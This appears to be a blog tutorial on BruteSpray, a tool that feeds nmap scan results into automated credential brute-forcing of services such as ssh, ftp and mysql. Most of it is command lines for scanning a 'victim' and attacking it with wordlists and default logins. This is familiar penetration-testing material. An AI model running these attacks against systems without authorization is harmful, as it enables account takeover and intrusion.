• Animesh Gupta

Brutespray – Port Scanning and Automated Brute Force Tool

BruteSpray takes nmap GNMAP/XML output and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.


Download from :


pip install -r requirements.txt

On Kali:

apt-get install brutespray


First do an nmap scan with -oG nmap.gnmap or -oX nmap.xml.

Command: python brutespray.py -h

Command: python brutespray.py --file nmap.gnmap

Command: python brutesrpay.py --file nmap.xml

Command: python brutespray.py --file nmap.xml -i

Attackers Machine(Kali Linux 2.0)

  • execute command  ./brutespray.py python script with 777 Permissions ( read,write,execute)

Scanning victim website

  • Start scanning your victim website or internal network with Nmap to check open ports and services.

  • Below Image illustrate Nmap scan followed by saving an output of nmap results with a filename.

  • Command executed: nmap –vv -n -oA Outputfilename

  • Here -oA is Output in all formats(.xml,.gnmap,nmap)

Nmap Output Mode

  • Previous Nmap scan will be saved in the .xml format as an output file.

  • This Output file (XML FILE) used to perform brute force attacks against open ports of the victim.

  • Below image illustrate Nmap scan output file as cybertechops.nmap


Using Custom Wordlists:

python brutespray.py --file nmap.gnmap -U /usr/share/wordlist/user.txt -P /usr/share/wordlist/pass.txt --threads 5 --hosts 5

Brute-Forcing Specific Services:

python brutespray.py --file nmap.gnmap --service ftp,ssh,telnet --threads 5 --hosts 5

Specific Credentials:

python brutespray.py --file nmap.gnmap -u admin -p password --threads 5 --hosts 5

Continue After Success:

python brutespray.py --file nmap.gnmap --threads 5 --hosts 5 -c

Use Nmap XML Output

python brutespray.py --file nmap.xml --threads 5 --hosts 5

Interactive Mode

python brutespray.py --file nmap.xml -i

Supported Services

  • ssh

  • ftp

  • telnet

  • vnc

  • mssql

  • mysql

  • postgresql

  • rsh

  • imap

  • nntp

  • pcanywhere

  • pop3

  • rexec

  • rlogin

  • smbnt

  • smtp

  • svn

  • vmauthd

  • snmp

Video Tutorial

©2019 Security Unleashed | New Delhi